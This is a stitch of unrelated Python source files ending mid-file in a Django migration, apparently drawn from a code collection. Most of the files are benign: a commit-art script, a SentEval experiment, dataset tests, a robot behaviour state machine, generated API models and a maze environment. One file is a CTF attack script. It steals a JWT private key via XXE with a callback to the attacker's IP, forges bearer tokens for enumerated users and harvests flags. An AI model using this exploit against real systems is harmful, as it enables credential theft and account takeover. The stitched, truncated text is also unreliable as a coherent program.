    groups = group_by_size(words)
    print(groups)
    for group_idx, group in enumerate(groups):
        print('Group: {}, {}'.format(group_idx, group))
        current_year = start_year + group_idx
        sentence = ' '.join(group)
        word_mat = word_matrix(sentence)
        week_number = week_for_group(group)
        # +10h keeps the commits safely inside the intended calendar day.
        current_date = date_from_week_number(current_year, week_number) + datetime.timedelta(hours=10)
        print('Sentence: {}, week: {}, start date: {}, word mat shape: {}'.format(sentence, week_number,
                                                                                  current_date, word_mat.shape))
        # Renamed the loop indices: the inner loop previously reused `i`,
        # shadowing the enumerate() index above.
        for col in range(word_mat.shape[1]):
            for row in range(word_mat.shape[0]):
                if word_mat[row, col] == 1:
                    no_of_commits = np.random.randint(commit_range[0], commit_range[1])
                    for _ in range(no_of_commits):
                        create_commit(repo, 'hello_world', name, email, current_date)
            # each matrix column corresponds to one calendar day
            current_date += datetime.timedelta(days=1)
"""
1) Create a test repo with words you want to write in dummy repository.
python3 -m commit_alphabets \
--repo_dir /tmp/test_repo \
--words LIFE,AND,UNIVERSE \
--start_year 1991 \
--name "Billi" \
--email abc@gmail.com
2) Push the newly created repository to github.
"""
# CLI entry point: expose create_named_commits via python-fire (usage above).
if __name__ == '__main__':
    Fire(create_named_commits)
|
# Copyright 2018 Babylon Partners. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# This source code is derived from SentEval source code.
# SentEval Copyright (c) 2017-present, Facebook, Inc.
# ==============================================================================
from __future__ import absolute_import, division, unicode_literals
import numpy as np
import sys
import logging
# Set PATHs
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
import utils
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
from similarity.fuzzy import fbow_jaccard_factory
# Set up logger
logging.basicConfig(format='%(asctime)s : %(name)s : %(message)s', level=logging.DEBUG)
def prepare(params, samples):
    """SentEval 'prepare' hook: build the vocabulary from *samples* and attach
    word vectors to *params*.

    Sets params.wvec_dim, params.word2id and params.word_vec in place.
    (Removed the redundant bare `return` and single-use temporaries.)
    """
    word_vec_path = utils.get_word_vec_path_by_name(params.word_vec_name)
    params.wvec_dim = 300  # dimensionality assumed for the loaded vectors
    _, params.word2id = utils.create_dictionary(samples)
    params.word_vec = utils.get_wordvec(word_vec_path,
                                        params.word2id,
                                        norm=params.norm,
                                        path_to_counts=params.word_count_path)
def batcher(params, batch):
    """SentEval 'batcher' hook: map each sentence to the list of its word vectors.

    Empty sentences are treated as ['.']; a sentence with no in-vocabulary
    words yields a single zero vector of dimension params.wvec_dim.
    """
    embeddings = []
    for sent in batch:
        tokens = sent if sent != [] else ['.']
        vectors = [params.word_vec[w] for w in tokens if w in params.word_vec]
        if not vectors:
            vectors = [np.zeros(params.wvec_dim)]
        embeddings.append(vectors)
    return embeddings
if __name__ == "__main__":
transfer_tasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16']
results = []
np.random.seed(1111)
for word_vec_name in ['glove']:
wv_path = utils.get_word_vec_path_by_name(word_vec_name)
# U = utils.load_wordvec_matrix(wv_path, lo=0, hi=100000)
# U = np.identity(300, dtype=np.float64)
U = np.random.normal(size=(300, 300))
fsimilarity = fbow_jaccard_factory(U)
logging.info('Word vectors: {0}'.format(word_vec_name))
logging.info('Similarity: {0}'.format('FBoW-Jaccard custom U'))
logging.info('BEGIN\n\n\n')
params_senteval = {
'task_path': PATH_TO_DATA
}
params_experiment = {
'word_vec_name': word_vec_name,
'similarity_name': 'fbow_jaccard'
}
params_senteval.update(params_experiment)
params_senteval['similarity'] = fsimilarity
se = senteval.engine.SE(params_senteval, batcher, prepare)
result = se.eval(transfer_tasks)
result_dict = {
'param': params_experiment,
'eval': result
}
results.append(result_dict)
|
def test_atyeo():
    """Atyeo dataset: tensor dims match axis labels; xarray selection drops a mode."""
    from ..atyeo import data
    cube = data()
    for dim, labels in zip(cube.tensor.shape, cube.axes):
        assert dim == len(labels)
    as_xr = data(xarray=True)
    assert len(as_xr.sel(Antigen='S').shape) == 2
def test_alter():
    """Alter dataset: tensor/matrix dims match axis labels; dataset has both arrays."""
    from ..alter import data
    cube = data()
    for dim, labels in zip(cube.tensor.shape, cube.axes):
        assert dim == len(labels)
    assert cube.tensor.shape[0] == cube.matrix.shape[0]
    assert cube.matrix.shape[1] == len(cube.axes[3])
    ds = data(xarray=True)
    assert "Fc" in ds
    assert "gp120" in ds
def test_zohar():
    """Zohar data: the 4-D tensor and the 3-D variant both match their axis labels."""
    from ..zohar import data, data3D
    cube = data()
    for dim, labels in zip(cube.tensor.shape, cube.axes):
        assert dim == len(labels)
    assert len(data(xarray=True).sel(Antigen='S1').shape) == 3
    cube3 = data3D()
    for dim, labels in zip(cube3.tensor.shape, cube3.axes):
        assert dim == len(labels)
    assert len(data3D(xarray=True).sel(Antigen='RBD').shape) == 2
def test_kaplonek():
    """Kaplonek SpaceX/MGH datasets: dims match axis labels; MGH dataset selectable."""
    from ..kaplonek import SpaceX, MGH, MGHds
    spacex = SpaceX()
    for dim, labels in zip(spacex.tensor.shape, spacex.axes):
        assert dim == len(labels)
    assert len(SpaceX(xarray=True).sel(Receptor='IgA').shape) == 2
    mgh = MGH()
    for dim, labels in zip(mgh.tensor.shape, mgh.axes):
        assert dim == len(labels)
    ds = MGHds()
    assert len(ds["Fc"].sel(Antigen='CMV').shape) == 3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.GetRosParam import GetRosParam
from sara_flexbe_behaviors.action_place_sm import Action_placeSM
from sara_flexbe_states.pose_gen_euler import GenPoseEuler
from sara_flexbe_states.TF_transform import TF_transformation
from flexbe_states.check_condition_state import CheckConditionState
from sara_flexbe_states.sara_say import SaraSay
from flexbe_states.flexible_calculation_state import FlexibleCalculationState
from flexbe_states.log_state import LogState
from flexbe_states.log_key_state import LogKeyState
from sara_flexbe_states.SetRosParam import SetRosParam
from sara_flexbe_states.SetKey import SetKey
from sara_flexbe_states.moveit_move import MoveitMove
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Tue Jul 11 2017
@author: Philippe La Madeleine
'''
class ActionWrapper_PlaceSM(Behavior):
    '''
    Action wrapper for the "place" action: checks the gripper content,
    computes a placement pose, runs the Action_place behavior, and reports
    the cause of failure on the ROS parameter server when something fails.
    '''

    def __init__(self):
        super(ActionWrapper_PlaceSM, self).__init__()
        self.name = 'ActionWrapper_Place'
        # parameters of this behavior
        # references to used behaviors
        self.add_behavior(Action_placeSM, 'Action_place')
        # Additional initialization code can be added inside the following tags
        # [MANUAL_INIT]
        # [/MANUAL_INIT]
        # Behavior comments:
        # O 369 2
        # Place|n1- where to put the object
        # O 588 404
        # Find a container-type object (the closest one?) and move there
        #   (translated from: "Chercher un objet de type container (le plus
        #   proche?) et se deplacer la bas")

    def create(self):
        """Assemble the wrapper state machine (generated by the FlexBE editor).

        Flow: read gripper content -> validate content and target ->
        announce -> generate arm pose -> transform to map frame ->
        Action_place -> park arm -> clear gripper param. Any failure routes
        through cause1/cause2/cause3 to 'setrosparamcause', which records the
        failure reason before the 'failed' outcome.
        The '# x:.. y:..' comments are editor canvas positions.
        """
        # x:702 y:576, x:764 y:158, x:766 y:33
        _state_machine = OperatableStateMachine(outcomes=['finished', 'failed', 'critical_fail'], input_keys=['Action'])
        _state_machine.userdata.Action = ["Place", "table"]
        _state_machine.userdata.Empty = None
        _state_machine.userdata.IdlePos = "IdlePose"

        # Additional creation code can be added inside the following tags
        # [MANUAL_CREATE]
        # [/MANUAL_CREATE]

        with _state_machine:
            # x:44 y:28
            OperatableStateMachine.add('gripper contain',
                                       GetRosParam(ParamName="behavior/GripperContent"),
                                       transitions={'done': 'if contain something', 'failed': 'cause1'},
                                       autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
                                       remapping={'Value': 'content'})

            # x:222 y:497
            OperatableStateMachine.add('Action_place',
                                       self.use_behavior(Action_placeSM, 'Action_place'),
                                       transitions={'finished': 'idlearm', 'failed': 'cause3'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
                                       remapping={'pos': 'MapPosition'})

            # x:39 y:367
            OperatableStateMachine.add('genPoseArm',
                                       GenPoseEuler(x=0.75, y=-0.25, z=0.85, roll=0, pitch=0, yaw=0),
                                       transitions={'done': 'referential from robot to map'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'pose': 'position'})

            # x:8 y:433
            OperatableStateMachine.add('referential from robot to map',
                                       TF_transformation(in_ref="base_link", out_ref="map"),
                                       transitions={'done': 'log pose', 'fail': 'log tf error'},
                                       autonomy={'done': Autonomy.Off, 'fail': Autonomy.Off},
                                       remapping={'in_pos': 'position', 'out_pos': 'MapPosition'})

            # x:25 y:98
            OperatableStateMachine.add('if contain something',
                                       CheckConditionState(predicate=lambda x: x != ''),
                                       transitions={'true': 'cond', 'false': 'say nothing in gripper'},
                                       autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
                                       remapping={'input_value': 'content'})

            # x:209 y:98
            OperatableStateMachine.add('say nothing in gripper',
                                       SaraSay(sentence="It seems I have nothing in my gripper", input_keys=[], emotion=1, block=True),
                                       transitions={'done': 'cause1'},
                                       autonomy={'done': Autonomy.Off})

            # x:28 y:236
            OperatableStateMachine.add('construction phrase',
                                       FlexibleCalculationState(calculation=lambda x: "I will place this "+str(x[0])+" on the "+str(x[1][1]), input_keys=["content", "Action"]),
                                       transitions={'done': 'Say_Place_object'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'content': 'content', 'Action': 'Action', 'output_value': 'sentence'})

            # x:33 y:167
            OperatableStateMachine.add('cond',
                                       CheckConditionState(predicate=lambda x: x[1] != ''),
                                       transitions={'true': 'construction phrase', 'false': 'cause2'},
                                       autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
                                       remapping={'input_value': 'Action'})

            # x:257 y:413
            OperatableStateMachine.add('log tf error',
                                       LogState(text="tf error", severity=Logger.REPORT_HINT),
                                       transitions={'done': 'cause3'},
                                       autonomy={'done': Autonomy.Off})

            # x:42 y:502
            OperatableStateMachine.add('log pose',
                                       LogKeyState(text="the placement pose will be: {}", severity=Logger.REPORT_HINT),
                                       transitions={'done': 'Action_place'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'data': 'MapPosition'})

            # x:493 y:535
            OperatableStateMachine.add('empty hand',
                                       SetRosParam(ParamName="behavior/GripperContent"),
                                       transitions={'done': 'finished'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'Value': 'Empty'})

            # x:448 y:54
            OperatableStateMachine.add('cause1',
                                       SetKey(Value="I didn't have any object in my gripper"),
                                       transitions={'done': 'setrosparamcause'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'Key': 'Key'})

            # x:422 y:149
            OperatableStateMachine.add('cause2',
                                       SetKey(Value="I didn't know where to place the object."),
                                       transitions={'done': 'setrosparamcause'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'Key': 'Key'})

            # x:575 y:158
            OperatableStateMachine.add('setrosparamcause',
                                       SetRosParam(ParamName="behavior/GPSR/CauseOfFailure"),
                                       transitions={'done': 'failed'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'Value': 'Key'})

            # x:449 y:325
            OperatableStateMachine.add('cause3',
                                       SetKey(Value="I was unable to calculate how to place the object."),
                                       transitions={'done': 'setrosparamcause'},
                                       autonomy={'done': Autonomy.Off},
                                       remapping={'Key': 'Key'})

            # x:342 y:583
            OperatableStateMachine.add('idlearm',
                                       MoveitMove(move=True, waitForExecution=False, group="RightArm", watchdog=15),
                                       transitions={'done': 'empty hand', 'failed': 'empty hand'},
                                       autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
                                       remapping={'target': 'IdlePos'})

            # x:706 y:460
            # NOTE(review): this state has no incoming transition in the
            # visible wiring — presumably dead, left by the editor; confirm.
            OperatableStateMachine.add('Say_Place_It_This_Place',
                                       SaraSay(sentence=lambda x: "I will place this "+x+" right there.", input_keys=[], emotion=0, block=True),
                                       transitions={'done': 'finished'},
                                       autonomy={'done': Autonomy.Off})

            # x:35 y:301
            OperatableStateMachine.add('Say_Place_object',
                                       SaraSay(sentence=lambda x: x, input_keys=[], emotion=0, block=True),
                                       transitions={'done': 'genPoseArm'},
                                       autonomy={'done': Autonomy.Off})

        return _state_machine

    # Private functions can be added inside the following tags
    # [MANUAL_FUNC]
    # [/MANUAL_FUNC]
|
# coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
import pprint
import re # noqa: F401
import six
class NotificationConfigGoogleResult(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'google_api_key': 'string'
    }

    attribute_map = {
        'google_api_key': 'google_api_key'
    }

    def __init__(self, google_api_key=None):  # noqa: E501
        """NotificationConfigGoogleResult - a model defined in Swagger"""  # noqa: E501
        # NOTE(review): the setter below rejects None, so constructing this
        # model without an explicit google_api_key raises ValueError —
        # presumably the property is required in the spec; confirm callers
        # always supply it.
        self._google_api_key = None
        self.discriminator = None
        self.google_api_key = google_api_key

    @property
    def google_api_key(self):
        """Gets the google_api_key of this NotificationConfigGoogleResult.  # noqa: E501

        GCM API key.  # noqa: E501

        :return: The google_api_key of this NotificationConfigGoogleResult.  # noqa: E501
        :rtype: string
        """
        return self._google_api_key

    @google_api_key.setter
    def google_api_key(self, google_api_key):
        """Sets the google_api_key of this NotificationConfigGoogleResult.

        GCM API key.  # noqa: E501

        :param google_api_key: The google_api_key of this NotificationConfigGoogleResult.  # noqa: E501
        :type: string
        """
        # Required property: reject None rather than silently storing it.
        if google_api_key is None:
            raise ValueError("Invalid value for `google_api_key`, must not be `None`")  # noqa: E501
        self._google_api_key = google_api_key

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialise nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, NotificationConfigGoogleResult):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
import unittest
from typing import List
import solution
class TestSolution(unittest.TestCase):
    """Regression tests for the gamma/epsilon and life-support rating computations."""

    def setUp(self) -> None:
        self.solution = solution.Solution()

    def test_simple_get_gamma_epsilon(self) -> None:
        gamma, epsilon = self.solution.get_gamma_epsilon(
            file_read_helper('simple_input.txt'))
        self.assertEqual((gamma, epsilon), (22, 9))
        self.assertEqual(gamma * epsilon, 198)

    def test_long_get_gamma_epsilon(self) -> None:
        gamma, epsilon = self.solution.get_gamma_epsilon(
            file_read_helper('long_input.txt'))
        self.assertEqual((gamma, epsilon), (3875, 220))
        self.assertEqual(gamma * epsilon, 852500)

    def test_simple_get_ratings(self) -> None:
        oxygen, co2 = self.solution.get_ratings(
            file_read_helper('simple_input.txt'))
        self.assertEqual((oxygen, co2), (23, 10))
        self.assertEqual(oxygen * co2, 230)

    def test_long_get_ratings(self) -> None:
        oxygen, co2 = self.solution.get_ratings(
            file_read_helper('long_input.txt'))
        self.assertEqual((oxygen, co2), (2235, 451))
        # 1007534 was a rejected ("too low") guess; 1007985 is the accepted answer.
        self.assertEqual(oxygen * co2, 1007985)
def file_read_helper(filename: str) -> List[str]:
    """Read *filename* as UTF-8 and return its lines, whitespace-stripped."""
    with open(filename, 'r', encoding='UTF-8') as file:
        return [line.strip() for line in file]
# Run the test suite when invoked directly.
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/python
# encoding: utf-8
# filename: formacaoAcademica.py
#
# scriptLattes V8
# Copyright 2005-2013: Jesús P. Mena-Chalco e Roberto M. Cesar-Jr.
# http://scriptlattes.sourceforge.net/
#
#
# Este programa é um software livre; você pode redistribui-lo e/ou
# modifica-lo dentro dos termos da Licença Pública Geral GNU como
# publicada pela Fundação do Software Livre (FSF); na versão 2 da
# Licença, ou (na sua opinião) qualquer versão.
#
# Este programa é distribuído na esperança que possa ser util,
# mas SEM NENHUMA GARANTIA; sem uma garantia implicita de ADEQUAÇÂO a qualquer
# MERCADO ou APLICAÇÃO EM PARTICULAR. Veja a
# Licença Pública Geral GNU para maiores detalhes.
#
# Você deve ter recebido uma cópia da Licença Pública Geral GNU
# junto com este programa, se não, escreva para a Fundação do Software
# Livre(FSF) Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
class FormacaoAcademica:
    """One academic-background ("Formação Acadêmica") entry parsed from a Lattes CV."""
    # Class-level defaults; instances shadow them on assignment.
    anoInicio = None       # start year (kept as a string)
    anoConclusao = None    # completion year (kept as a string)
    tipo = ''              # degree type (text before the first '.')
    nomeInstituicao = ''   # institution name (text between the first two '.')
    descricao = ''         # remaining free-text description

    def __init__(self, partesDoItem=None):
        # partesDoItem[0]: period of the entry ("start - end")
        # partesDoItem[1]: description of the entry ("type. institution. details")
        if partesDoItem != None:  # otherwise the caller is expected to use the setters
            anos = partesDoItem[0].partition(" - ")
            self.anoInicio = anos[0];
            self.anoConclusao = anos[2];
            detalhe = partesDoItem[1].partition(".")
            self.tipo = detalhe[0].strip()
            detalhe = detalhe[2].strip().partition(".")
            self.nomeInstituicao = detalhe[0].strip()
            self.descricao = detalhe[2].strip()

    def format_anos(self, anos):
        # Split a "start - end" period; a single year is used for both bounds.
        if(anos.count("-")):
            return anos.split(" - ")
        return (anos, anos)

    def set_anos(self, anos):
        a, b = self.format_anos(anos)
        self.anoInicio = a
        self.anoConclusao = b

    def set_ano_conclusao(self, ano):
        self.anoConclusao = ano

    def set_tipo(self, tipo):
        self.tipo = tipo

    def set_nome_instituicao(self, nome):
        self.nomeInstituicao = nome

    # private
    def format_descricao(self, desc):
        # Join the items of *desc*, appending a newline after each one.
        linesbreaks = ["\n"]*len(desc)
        return "".join([a+b for a, b in zip(desc, linesbreaks)])

    def set_descricao(self, desc):
        self.descricao = self.format_descricao(desc)

    # ------------------------------------------------------------------------ #
    def __str__(self):
        # NOTE(review): str.encode() returns bytes on Python 3, so these
        # str+bytes concatenations only work on Python 2 (the interpreter this
        # project targets) — confirm before running under Python 3.
        s = "\n[FORMACAO ACADEMICA] \n"
        s += "+ANO INICIO : " + self.anoInicio.encode('utf8','replace') + "\n"
        s += "+ANO CONCLUS.: " + self.anoConclusao.encode('utf8','replace') + "\n"
        s += "+TIPO : " + self.tipo.encode('utf8','replace') + "\n"
        s += "+INSTITUICAO : " + self.nomeInstituicao.encode('utf8','replace') + "\n"
        s += "+DESCRICAO : " + self.descricao.encode('utf8','replace') + "\n"
        return s
|
#!/usr/bin/env python3.8
import fake_jwt
import xxe_handler
import exploit_api
from re import match, compile  # NOTE(review): this shadows the builtin `compile`
# Flag format: exactly 31 chars of [A-Z0-9] followed by '='.
regexp = compile(r'^[A-Z0-9]{31}=$')
def exploit_one_team(victim_url, last_dish_id, our_ip, our_port):
    """Steal the JWT private key via XXE, then harvest flags from every user's dishes.

    Returns (flags, next_dish_id) so the caller can resume enumeration later.
    """
    private_key = xxe_handler.stole_private_key(our_ip, our_port, victim_url)
    token_header = exploit_api.get_header_with_token(victim_url)

    # Walk dish ids upward from the last seen one to discover user ids.
    users = []
    dish_id = last_dish_id + 1
    while True:
        dish = exploit_api.get_dish(token_header, dish_id, victim_url)
        if dish is None:
            break
        users.append(dish['createdBy'])
        dish_id += 1
    print(f'[+] Get users: {len(users)}')

    # Forge a token per user and collect every field that may hold a flag.
    maybe_flags = []
    for user_id in users:
        access_token = fake_jwt.get_fake_jwt_token(victim_url, user_id, private_key).decode()
        user_token_header = {'Authorization': f'Bearer {access_token}'}
        dishes = exploit_api.get_dishes(user_token_header, victim_url)['items']
        print(f'[+] Get user dishes: {len(dishes)}')
        for dish in dishes:
            maybe_flags.append(dish['recipe'])
            maybe_flags.extend(ing['product']['manufacturer'] for ing in dish['ingredients'])

    flags = [f for f in maybe_flags if f is not None and match(regexp, f)]
    return flags, dish_id
if __name__ == "__main__":
our_port = 20001
our_ip = "192.168.0.101"
victim_url = "http://192.168.0.101:5000"
last_dish_id = 0
flags, last_dish_id = exploit_one_team(victim_url, last_dish_id, our_ip, our_port)
print(flags)
|
# Import packages
import sys
import time
import numpy as np

# BUG FIX: sys.version_info is a tuple-like object, so `sys.version_info == 2`
# is always False and the Python 2 branch was unreachable (a crash under
# Python 2). Compare the major component instead.
if sys.version_info[0] == 2:
    import Tkinter as tk
else:
    import tkinter as tk

from BaseEnvironment import BaseEnvironment
from BaseAgent import BaseAgent
# Implement the class MazeEnvironment based on the mother class BaseEnvironment
class MazeEnvironment(BaseEnvironment):
    """Tkinter grid-maze environment with 9 discrete actions (stay + 8 directions).

    Rewards: -1 per step, -100 for stepping into an obstacle (position is left
    unchanged), +1 for reaching goal_loc (episode done).
    """

    def __init__(self, env_info):
        """
        Set up a maze environment.
        params:
            - env_info (dict): configuration — 'unit' (pixels per cell),
              'height'/'width' (cells), 'obstacles' (list of (x, y)),
              'start_loc', 'goal_loc', 'time_sleep' (render delay, seconds)
        """
        # Cell size in pixels and grid dimensions in cells.
        self.unit = env_info.get('unit', 40)
        self.height_unit = env_info.get('height', 10)
        self.width_unit = env_info.get('width', 10)
        # Validate dimensions supplied through env_info.
        assert self.height_unit > 0, 'grid_height is not positive'
        assert self.width_unit > 0, 'grid_width is not positive'
        # Obstacle cells, if any.
        self.obstacles = env_info.get('obstacles', [])
        # Map integer action ids onto 2-D displacements (dx, dy).
        # BUG FIX: action 7 ('left') used to be (0,-1), which duplicated
        # action 5 ('down') and made it impossible to move left; now (-1,0).
        # NOTE(review): the canvas y axis grows downward, so action 1 ('up')
        # increases y and moves the dot down on screen — confirm the intended
        # orientation.
        self.map_actions = {0: (0, 0),    # no movement
                            1: (0, 1),    # up
                            2: (1, 1),    # up-right
                            3: (1, 0),    # right
                            4: (1, -1),   # down-right
                            5: (0, -1),   # down
                            6: (-1, -1),  # down-left
                            7: (-1, 0),   # left
                            8: (-1, 1)}   # up-left
        # Set number of actions attribute
        self.num_actions = len(self.map_actions)
        # Starting and goal positions (cell coordinates).
        self.start_loc = env_info.get('start_loc')
        self.goal_loc = env_info.get('goal_loc')
        # (reward, state, done) tuple updated by reset()/step().
        reward = None
        state = None
        done = False  # True once the goal has been reached
        self.reward_state_done = (reward, state, done)
        # Create the main window for the environment.
        self.window = tk.Tk()
        self.window.title('Maze')
        self.window.geometry('{}x{}'.format((self.width_unit+1)*self.unit, (self.height_unit+1)*self.unit))
        # Delay between interactions with an agent (seconds).
        self.time_sleep = env_info.get('time_sleep', 0.01)
        # Build maze inside of the main window.
        self.__build_maze()

    def __build_maze(self):
        """
        Private method: draw the maze (grid, goal, start, agent, obstacles)
        on a canvas inside the main window.
        """
        self.canvas = tk.Canvas(master=self.window, bg='white',
                                width=self.width_unit*self.unit, height=self.height_unit*self.unit)
        # draw vertical lines
        for c in range(0, self.width_unit*self.unit, self.unit):
            x0, y0, x1, y1 = c, 0, c, self.height_unit*self.unit
            self.canvas.create_line(x0, y0, x1, y1)
        # draw horizontal lines
        for c in range(0, self.height_unit*self.unit, self.unit):
            x0, y0, x1, y1 = 0, c, self.width_unit*self.unit, c
            self.canvas.create_line(x0, y0, x1, y1)
        # Goal cell (green square).
        goal_center = np.array([self.goal_loc[0], self.goal_loc[1]])*self.unit + self.unit/2.
        self.goal_point = self.canvas.create_rectangle(goal_center[0] - self.unit/2., goal_center[1] - self.unit/2.,
                                                       goal_center[0]+self.unit/2., goal_center[1]+self.unit/2.,
                                                       fill='green')
        # Start cell (orange square).
        start_center = np.array([self.start_loc[0], self.start_loc[1]])*self.unit + self.unit/2.
        self.start_point = self.canvas.create_rectangle(start_center[0]-self.unit/2.,
                                                        start_center[1]-self.unit/2.,
                                                        start_center[0]+self.unit/2.,
                                                        start_center[1]+self.unit/2.,
                                                        fill='orange')
        # Agent marker (red disc) placed on the start cell.
        self.agent_point = self.canvas.create_oval(start_center[0]-self.unit/3., start_center[1]-self.unit/3.,
                                                   start_center[0]+self.unit/3., start_center[1]+self.unit/3.,
                                                   fill='red')
        # Obstacle cells (black squares), if any.
        if len(self.obstacles) > 0:
            self.obstacles_points = []
            for obstacle in self.obstacles:
                obstacle_center = np.array([obstacle[0], obstacle[1]])*self.unit + self.unit/2.
                self.obstacles_points.append(self.canvas.create_rectangle(obstacle_center[0]-self.unit/2.,
                                                                          obstacle_center[1]-self.unit/2.,
                                                                          obstacle_center[0]+self.unit/2.,
                                                                          obstacle_center[1]+self.unit/2., fill='black'))
        self.canvas.pack()

    def render(self):
        """
        Show and update the maze window (with a small delay so the motion is visible).
        """
        time.sleep(self.time_sleep)
        self.window.update()

    def __get_state_as_integer(self, state):
        """
        Convert the agent's (x, y) position into a single integer (row-major index).
        Params:
            - state --> tuple (x, y)
        Returns:
            - num_state --> integer value representing the input state
        """
        x = state[0]
        y = state[1]
        # The position must lie inside the grid.
        assert (x < self.width_unit and x >= 0 and y < self.height_unit and y >= 0),\
            'Position {} not inside of the Environment'.format(state)
        num_state = y*self.width_unit + x
        return num_state

    def reset(self):
        """
        Move the agent back to the start location and return it as an integer
        state; also resets the (reward, state, done) tuple.
        Returns:
            - num_state --> integer corresponding to the starting state
        """
        reward = None
        done = False
        # Move the agent marker back onto the start cell.
        start_center = np.array([self.start_loc[0], self.start_loc[1]])*self.unit + self.unit/2.0
        self.canvas.coords(self.agent_point, start_center[0]-self.unit/3., start_center[1]-self.unit/3., start_center[0]+self.unit/3., start_center[1]+self.unit/3.)
        self.agent_loc = self.start_loc
        num_state = self.__get_state_as_integer(self.agent_loc)
        self.reward_state_done = (reward, num_state, done)
        return num_state

    def step(self, action):
        """
        Apply *action* and return (reward, state, done).
        Params: action --> Integer representing an action by agent
            {stop: 0, up: 1, right-up: 2, right: 3, right-down: 4, down: 5, left-down: 6, left: 7, left-up: 8}
        """
        # Translate the action id into a 2-D displacement.
        action2d = self.map_actions[action]
        Ax = action2d[0]
        Ay = action2d[1]
        x = self.agent_loc[0]
        y = self.agent_loc[1]
        # Clamp the next location to the grid bounds.
        next_loc = (max(0, min(x+Ax, self.width_unit-1)),
                    max(0, min(y+Ay, self.height_unit-1)))
        # Default step cost.
        reward = -1.
        done = False
        if next_loc == self.goal_loc:
            # Goal reached: positive reward, episode ends.
            reward = 1.
            done = True
        elif next_loc in self.obstacles:
            # Obstacle hit: heavy penalty and the agent stays where it was.
            reward = -100.
            next_loc = (x, y)
        if next_loc != self.agent_loc:
            # Effective displacement (may differ from the action when clamped
            # at the maze border).
            deltax, deltay = next_loc[0] - self.agent_loc[0], next_loc[1] - self.agent_loc[1]
            self.agent_loc = next_loc
            # Move the agent marker on the canvas accordingly.
            self.canvas.move(self.agent_point, deltax*self.unit, deltay*self.unit)
        state = self.__get_state_as_integer(self.agent_loc)
        self.reward_state_done = (reward, state, done)
        return self.reward_state_done

    def close_window(self):
        """
        Close the maze window and stop the Tk event loop.
        """
        self.window.quit()
        self.window.destroy()
        self.window.mainloop()

    def cleanup(self):
        """
        Clean up environment attributes (nothing to do for this environment).
        """
        pass
def main():
    """Drive the maze with a random agent for 100 steps, then close it."""
    # environment configuration: grid size, start/goal cells, obstacle cells
    env_info = {'height':6, 'width':6, 'start_loc':(0,0),'goal_loc':(5,5), 'obstacles':[(2,2),(3,3)]}
    maze = MazeEnvironment(env_info)
    # size of the discrete action set the agent samples from
    num_actions = 9
    # initialise the environment and draw the initial frame
    maze.reset()
    maze.render()
    for _step in range(100):
        # sample a random action and apply it to the environment
        action = np.random.choice(num_actions)
        reward, state, done = maze.step(action)
        # refresh the display and report the transition
        maze.render()
        print('action:{}, reward:{}, state:{}, done:{}'.format(action, reward, state, done))
    # keep the window visible briefly before tearing it down
    time.sleep(3)
    maze.close_window()
if __name__ == '__main__':
    main()
|
# Generated by Django 3.0.4 on 2020-07-02 16:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial schema for the newspaper-distribution app: newspapers, orders,
    # post offices, printing houses and print runs (auto-generated by Django).

    # first migration of the app — no predecessors
    initial = True
    dependencies = [
    ]
    operations = [
        # Newspaper: title, editor, edition index and per-copy price
        migrations.CreateModel(
            name='Newspaper',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
